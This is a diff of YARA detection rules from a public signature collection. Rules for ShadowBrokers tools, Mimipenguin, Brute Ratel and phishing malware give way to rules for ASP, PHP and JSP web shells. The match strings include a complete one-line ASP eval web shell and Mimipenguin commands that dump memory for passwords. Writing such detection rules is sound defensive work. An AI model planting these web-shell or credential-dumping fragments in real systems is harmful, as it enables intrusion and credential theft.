+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L277-L291"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d7a82204d3e511cf5af58eabdd6e9757c5dd243f9aca3999dc0e5d1603b1fa37"
-		logic_hash = "a13c8a1fc66381b040d6449fe9655191d7a1762da0dc70789cd497fb68fb2a55"
-		score = 80
+		hash = "35fb37f3c806718545d97c6559abd262"
+		logic_hash = "8769400b7b6828849f27092d790d291721c7e1b39dfd2080de5da8e59dd25523"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
-		$s2 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii
-		$s3 = "specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSES" ascii
-		$s4 = "Could not enable debug privileges. You must run this tool with an account with administrator privileges." fullword ascii
-		$s5 = "-B is now used by default. Trying to find correct addresses.." fullword ascii
-		$s6 = "Cannot get LSASS.EXE PID!" fullword ascii
+		$s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in"
+		$s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 320KB and 2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbrokers_Jan17_Screen_Strings : FILE
+rule SIGNATURE_BASE_Webshell_Caidao_Shell_Ice
 {
 	meta:
-		description = "Detects strings derived from the ShadowBroker's leak of Windows tools/exploits"
+		description = "Web Shell - file ice.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "59832d0a-0cb2-5eb9-a4e2-36aaa09a3998"
-		date = "2017-01-08"
-		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message7/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_jan17.yar#L10-L47"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L292-L305"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8015b227c5df68fffadb86b72843b2b831d5603978ada3f50cc535a870aa94eb"
-		score = 75
+		hash = "6560b436d3d3bb75e2ef3f032151d139"
+		logic_hash = "d92cc9ac8630b40f23b9ff7cda5a237b4885d30de4b9b497be7512e7eb020a09"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Danderspritz" ascii wide fullword
-		$x2 = "DanderSpritz" ascii wide fullword
-		$x3 = "PeddleCheap" ascii wide fullword
-		$x4 = "ChimneyPool Addres" ascii wide fullword
-		$a1 = "Getting remote time" fullword ascii
-		$a2 = "RETRIEVED" fullword ascii
-		$b1 = "Added Ops library to Python search path" fullword ascii
-		$b2 = "target: z0.0.0.1" fullword ascii
-		$c1 = "Psp_Avoidance" fullword ascii
-		$c2 = "PasswordDump" fullword ascii
-		$c4 = "EventLogEdit" fullword ascii
-		$d1 = "Mcl_NtElevation" fullword ascii wide
-		$d2 = "Mcl_NtNativeApi" fullword ascii wide
-		$d3 = "Mcl_ThreatInject" fullword ascii wide
-		$d4 = "Mcl_NtMemory" fullword ascii wide
+		$s0 = "<%eval request(\"ice\")%>" fullword
 
 	condition:
-		filesize < 2000KB and ( 1 of ( $x* ) or all of ( $a* ) or 1 of ( $b* ) or ( uint16( 0 ) == 0x5a4d and 1 of ( $c* ) ) or 3 of ( $c* ) or ( uint16( 0 ) == 0x5a4d and 3 of ( $d* ) ) )
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_PS1_JAB_Pattern_Jun22_1 : FILE
+rule SIGNATURE_BASE_Webshell_Cihshell_Fix
 {
 	meta:
-		description = "Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable"
+		description = "Web Shell - file cihshell_fix.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9ecca7d9-3b63-5615-a223-5efa1c53510e"
-		date = "2022-06-10"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_ps_jab.yar#L2-L29"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L306-L320"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9ad61dca5c945ed87642668e3b834b12c813af244437903a5abb5c69459b9456"
+		hash = "3823ac218032549b86ee7c26f10c4cb5"
+		logic_hash = "59ae76d6828d8c0ddcbafa19063e6dcf25c826386f46df2b8f9674b628365a2b"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { 4a 41 42 ?? 41 43 41 41 50 51 41 67 41 }
-		$xc2 = { 4a 00 41 00 42 00 ?? 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41 }
-		$xc3 = { 4a 41 42 ?? 41 44 30 41 }
-		$xc4 = { 4a 00 41 00 42 00 ?? 00 41 00 44 00 30 00 41 }
+		$s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty"
+		$s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos"
 
 	condition:
-		filesize < 30MB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_PHISH_02Dez2015_Dropped_P0O6543F_1 : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Shell
 {
 	meta:
-		description = "Phishing Wave - file p0o6543f.exe"
+		description = "Web Shell - file shell.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3335ad3c-47f8-5547-bac0-df2d98ff644f"
-		date = "2015-12-02"
-		modified = "2023-12-05"
-		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_phish_gina_dec15.yar#L8-L29"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L321-L335"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "db788d6d3a8ed1a6dc9626852587f475e7671e12fa9c9faa73b7277886f1e210"
-		logic_hash = "91fc1b4682c1490b916b11685e1ecc74a964d657e544c0b84e8301b299154d02"
-		score = 75
+		hash = "e63f5a96570e1faf4c7b8ca6df750237"
+		logic_hash = "5cc698e4ff23ca296b339589d12c24e67c99272e73445604a4552d3023e19636"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "netsh.exe" fullword wide
-		$s2 = "routemon.exe" fullword wide
-		$s3 = "script=" fullword wide
-		$s4 = "disconnect" fullword wide
-		$s5 = "GetClusterResourceTypeKey" fullword ascii
-		$s6 = "QueryInformationJobObject" fullword ascii
-		$s7 = "interface" fullword wide
-		$s8 = "connect" fullword wide
-		$s9 = "FreeConsole" fullword ascii
+		$s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword
+		$s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_PHISH_02Dez2015_Dropped_P0O6543F_2 : FILE
+rule SIGNATURE_BASE_Webshell_Private_I3Lue
 {
 	meta:
-		description = "Phishing Wave used MineExplorer Game by WangLei - file p0o6543f.exe.4"
+		description = "Web Shell - file Private-i3lue.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ed6f6dc8-5b5d-5a6f-a2a0-cb8a34c8931f"
-		date = "2015-12-03"
-		modified = "2023-12-05"
-		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_phish_gina_dec15.yar#L31-L47"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L336-L349"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f5eb21d0f635171e1edcfecc909bc3508dfb6c32e7fdd7263edd5cd98e6ba411"
-		score = 75
+		hash = "13f5c7a035ecce5f9f380967cf9d4e92"
+		logic_hash = "274586f2c451eda45c3a52b615961dbba806f8d25e34cc358e661fcfd1143d08"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d6b21ded749b57042eede07c3af1956a3c9f1faddd22d2f78e43003a11ae496f"
-		hash2 = "561b16643992b92d37cf380bc2ed7cd106e4dcaf25ca45b4ba876ce59533fb02"
 
 	strings:
-		$s1 = "Email: W0067@990.net" fullword wide
-		$s2 = "MineExplorer Version 1.0" fullword wide
-		$s6 = "Copy Rights by WangLei 1999.4" fullword wide
+		$s8 = "case 15: $image .= \"\\21\\0\\"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_PHISH_02Dez2015_Attach_P_ORD_C_10156_124658 : FILE
+rule SIGNATURE_BASE_Webshell_Php_Up
 {
 	meta:
-		description = "Phishing Wave - file P-ORD-C-10156-124658.xls"
+		description = "Web Shell - file up.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8989379a-6cd9-52ba-be18-5d402a440758"
-		date = "2015-12-02"
-		modified = "2023-12-05"
-		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_phish_gina_dec15.yar#L49-L73"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L350-L365"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a2820b024b371447eab71f153b6251776719cfe55e08cb2a3cda5ee6da29949d"
-		score = 75
+		hash = "7edefb8bd0876c41906f4b39b52cd0ef"
+		logic_hash = "22f444ce4068f46c0b57e566faca0c6377346e403de592b0e51869781fda31a9"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bc252ede5302240c2fef8bc0291ad5a227906b4e70929a737792e935a5fee209"
-		hash2 = "e6c5b55586e9d99551adc27a0fc9c080cea6201fae60104b82d5a2ec518fafb6"
-		hash3 = "80f278b7268ea6814f8b336e07c5f4b03289519e199fbe4cbd9ef6a38cf25df6"
-		hash4 = "3a0a758525883a049a42312e46a023076c31af23b5e8e5b81fec56d51e4c80fb"
-		hash5 = "bc252ede5302240c2fef8bc0291ad5a227906b4e70929a737792e935a5fee209"
-		hash6 = "d9db7d32949c4df6a5d9d0292b576ae19681be7b6e0684df57338390e87fc6d6"
-		hash7 = "7bb705701ae73d377f6091515a140f0af57703719a67da9a60fad4544092ee6c"
-		hash8 = "e743c6e7749ab1046a2beea8733d7c8386ea60b43492bb4f0769ced6a2cee66d"
 
 	strings:
-		$s1 = "Execute" ascii
-		$s2 = "Process WriteParameterFiles" fullword ascii
-		$s3 = "WScript.Shell" fullword ascii
-		$s4 = "STOCKMASTER" fullword ascii
-		$s5 = "InsertEmailFax" ascii
+		$s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword
+		$s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword
+		$s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 200KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_Bruteratel_Badger_Indicators_Oct22_4 : FILE
+rule SIGNATURE_BASE_Webshell_Mysql_Interface_V1_0
 {
 	meta:
-		description = "Detects Brute Ratel C4 badger indicators"
-		author = "Matthew @embee_research, Florian Roth"
-		id = "a62d08ae-0fb3-55e9-b6f8-7940f8032e4a"
-		date = "2022-10-12"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/embee_research/status/1580030310778953728"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/hktl_bruteratel_c4_badger.yar#L2-L19"
+		description = "Web Shell - file Mysql interface v1.0.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L366-L379"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9af05225f462c8d4ec1fb14dc06bb789f76b0d818cb82c3dfcd5abc693727f33"
-		score = 75
+		hash = "a12fc0a3d31e2f89727b9678148cd487"
+		logic_hash = "baa938c4cfd2c46b1752d866e186d76a04c353617d8ec3e0d78a3c546b120d13"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = { b? 89 4d 39 8c }
-		$s2 = { b? bd ca 3b d3 }
-		$s3 = { b? b2 c1 06 ae }
-		$s4 = { b? 74 eb 1d 4d }
+		$s0 = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return"
 
 	condition:
-		filesize < 8000KB and all of ( $s* ) and not uint8( 0 ) == 0x02
+		all of them
 }
-rule SIGNATURE_BASE_EXT_SUSP_OBFUSC_Macos_Roothelper_Obfuscated : FILE
+rule SIGNATURE_BASE_Webshell_Php_S_U
 {
 	meta:
-		description = "Yara for the public tool 'roothelper'. Used by XCSSET (https://gist.github.com/NullArray/f39b026b9e0d19f1e17390a244d679ec)"
-		author = "im0prtp3"
-		id = "7ff91c00-8178-525c-bb41-d09cf7cda588"
-		date = "2021-06-07"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/imp0rtp3/status/1401912205621202944"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hktl_roothelper.yar#L2-L55"
+		description = "Web Shell - file s-u.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L380-L393"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2121de0409f3f8e4c4e079944efb605776e0475cadc25607eb888cc6461ecaf3"
-		score = 65
-		quality = 83
-		tags = "FILE"
+		hash = "efc7ba1a4023bcf40f5e912f1dd85b5a"
+		logic_hash = "3c6904fa475784e737275fd47eabea077bed57e920071c68fa09f7defecbdb72"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "E: neither argv[0] nor $_ works." fullword
-		$b1 = "shll=%s\n" fullword
-		$b2 = "argv[%d]=%.60s\n" fullword
-		$b3 = "getenv(%s)=%s\n" fullword
-		$b4 = "argc=%d\n" fullword
-		$b5 = "argv=<null>\n" fullword
-		$c1 = "%s%s%s: %s\n" fullword
-		$c2 = "x%lx" fullword
-		$c3 = "=%lu %d" fullword
-		$c4 = "%lu %d%c" fullword
-		$f1 = "rmarg"
-		$f2 = "chkenv"
-		$f3 = "untraceable"
-		$f4 = "arc4"
-		$f6 = "stte"
-		$f7 = "with_file"
-		$opcodes_1 = { 99 F7 7D ?? 4C 63 C2 42 0F B6 14 01 0F B6 3D }
-		$opcodes_2 = { C6 [3] 00 00 00 C6 [3] 00 00 00 C6 [3] 00 00 00 8A 05 [2] 00 00 0F B6 [3] 00 00 89 CA }
-		$opcodes_3 = { E8 [2] FF FF	8B 85 ?? F? FF FF 2B 85 ?? F? FF FF	83 ?? 01 89 85 ?? F? FF FF E9 ?? 00 00 00 }
-		$weak_opcodes_1 = {48 8B 45 ?? 48 8B 00 48 3B 45 ??	0F 95 C1 88 4D ??}
-		$weak_opcodes_2 = {	48 8B 45 ??	48 83 38 ??	0F 95 C1 88 4D ?? }
+		$s6 = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea"
 
 	condition:
-		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca ) and ( $a1 or 3 of ( $b* ) or 5 of ( $f* ) or all of ( $opcodes* ) or ( 2 of ( $b* ) and ( 2 of ( $c* ) or 2 of ( $opcodes* ) ) ) or ( 3 of ( $c* ) and 4 of ( $f* ) ) or ( 2 of ( $opcodes* ) and ( all of ( $weak_opcodes* ) or 3 of ( $c* ) ) ) )
+		all of them
 }
-rule SIGNATURE_BASE_Mimipenguin_SH
+rule SIGNATURE_BASE_Webshell_Phpshell_2_1_Config
 {
 	meta:
-		description = "Detects Mimipenguin Password Extractor - Linux"
+		description = "Web Shell - file config.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c670f6fe-562d-598f-a73f-45e4ab234f7d"
-		date = "2017-04-01"
-		modified = "2023-12-05"
-		reference = "https://github.com/huntergregal/mimipenguin"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimipenguin.yar#L8-L22"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L394-L407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5d9827e7adfe667a4a46e23854cac3b63949abcde5709045f0fe65e7b5704265"
-		score = 75
+		hash = "bd83144a649c5cc21ac41b505a36a8f3"
+		logic_hash = "51d16bcaef5f6795ebcd1154dca79d5cf5a389948b0e59f4939c30fef877e816"
+		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$(echo $thishash | cut -d'$' -f 3)" ascii
-		$s2 = "ps -eo pid,command | sed -rn '/gnome\\-keyring\\-daemon/p' | awk" ascii
-		$s3 = "MimiPenguin Results:" ascii
+		$s1 = "; (choose good passwords!).  Add uses as simple 'username = \"password\"' lines." fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Mimipenguin_1 : FILE
+rule SIGNATURE_BASE_Webshell_Asp_EFSO_2
 {
 	meta:
-		description = "Detects Mimipenguin hack tool"
+		description = "Web Shell - file EFSO_2.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62754337-52ef-5d3f-af2f-52f820ba0476"
-		date = "2017-07-08"
-		modified = "2023-12-05"
-		reference = "https://github.com/huntergregal/mimipenguin"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimipenguin.yar#L34-L50"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L408-L421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "60a7b64eee9e2adfbc65fb5762f18e2abc4a35f9368ad704754870b5e8311391"
-		score = 75
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+		logic_hash = "19bd00fabe0b4695129c180dd145e757e0b2c2a6dad751e8c889222c191e03ce"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9e8d13fe27c93c7571075abf84a839fd1d31d8f2e3e48b3f4c6c13f7afcf8cbd"
 
 	strings:
-		$x1 = "self._strings_dump += strings(dump_process(target_pid))" fullword ascii
-		$x2 = "def _dump_target_processes(self):" fullword ascii
-		$x3 = "self._target_processes = ['sshd:']" fullword ascii
-		$x4 = "GnomeKeyringPasswordFinder()" ascii
+		$s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB"
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Mimipenguin_2 : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Up
 {
 	meta:
-		description = "Detects Mimipenguin hack tool"
+		description = "Web Shell - file up.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b3bb1ba9-cbfc-53fd-81d0-256466ace4de"
-		date = "2017-07-08"
-		modified = "2023-12-05"
-		reference = "https://github.com/huntergregal/mimipenguin"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimipenguin.yar#L52-L69"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L422-L435"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "53a1f47ef9c94ef6bffbc9d7b9f3a8e0a7fb132c0936ea27e6be775cf99792a0"
-		score = 75
+		hash = "515a5dd86fe48f673b72422cccf5a585"
+		logic_hash = "77c8121d000c45e44717689dec535fde7c9722005d1e4ff40d0b84abcf289f47"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "453bffa90d99a820e4235de95ec3f7cc750539e4023f98ffc8858f9b3c15d89a"
 
 	strings:
-		$x1 = "DUMP=$(strings \"/tmp/dump.${pid}\" | grep -E" fullword ascii
-		$x2 = "strings /tmp/apache* | grep -E '^Authorization: Basic.+=$'" fullword ascii
-		$x3 = "grep -E '^_pammodutil_getpwnam_root_1$' -B 5 -A" fullword ascii
-		$x4 = "strings \"/tmp/dump.${pid}\" | grep -E -m 1 '^\\$.\\$.+\\$')\"" fullword ascii
-		$x5 = "if [[ -n $(ps -eo pid,command | grep -v 'grep' | grep gnome-keyring) ]]; then" fullword ascii
+		$s9 = "// BUG: Corta el fichero si es mayor de 640Ks" fullword
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_VEST_Encryption_Core_Accumulator_Jan21 : FILE
+rule SIGNATURE_BASE_Webshell_Networkfilemanagerphp
 {
 	meta:
-		description = "Detects VEST encryption core accumulator in PE file as used by Lazarus malware"
+		description = "Web Shell - file NetworkFileManagerPHP.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8343652b-8865-5213-b735-d6d4084e4a84"
-		date = "2021-01-28"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/ochsenmeier/status/1354737155495649280"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_jan21.yar#L2-L25"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L436-L449"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "41fe42b2f2b5fb54b7ff19b74a35aadd928be9a3c7280ee9feffc4a142924b07"
+		hash = "acdbba993a5a4186fd864c5e4ea0ba4f"
+		logic_hash = "235e4062a9b9ebdf7dd0b8a2cb3b16ba7688a75b90d8c527344cf9605304838d"
 		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "7cd3ca8bdfb44e98a4b9d0c6ad77546e03d169bda9bdf3d1bcf339f68137af23"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sc1 = { 4F 70 46 DA E1 8D F6 41 59 E8 5D 26 1E CC 2F 89
-               26 6D 52 BA BC 11 6B A9 C6 47 E4 9C 1E B6 65 A2
-               B6 CD 90 47 1C DF F8 10 4B D2 7C C4 72 25 C6 97
-               25 5D C6 1D 4B 36 BC 38 36 33 F8 89 B4 4C 65 A7
-               96 CA 1B 63 C3 4B 6A 63 DC 85 4C 57 EE 2A 05 C7
-               0C E7 39 35 8A C1 BF 13 D9 52 51 3D 2E 41 F5 72
-               85 23 FE A1 AA 53 61 3B 25 5F 62 B4 36 EE 2A 51
-               AF 18 8E 9A C6 CF C4 07 4A 9B 25 9B 76 62 0E 3E
-               96 3A A7 64 23 6B B6 19 BC 2D 40 D7 36 3E E2 85
-               9A D1 22 9F BC 30 15 9F C2 5D F1 23 E6 3A 73 C0 }
+		$s9 = "  echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_Gozicrypter_Dec20_1 : FILE
+rule SIGNATURE_BASE_Webshell_Server_Variables
 {
 	meta:
-		description = "Detects crypter associated with several Gozi samples"
-		author = "James Quinn"
-		id = "d4a48612-fa6f-5f03-8d27-5f6b79b2a070"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "YaraExchange"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_gozi_crypter.yar#L2-L13"
+		description = "Web Shell - file Server Variables.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L450-L464"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "51fdfbb59b8f52cc2ff89d994c0f89d2c2895c346b098879c68b4ccb880783c1"
+		hash = "47fb8a647e441488b30f92b4d39003d7"
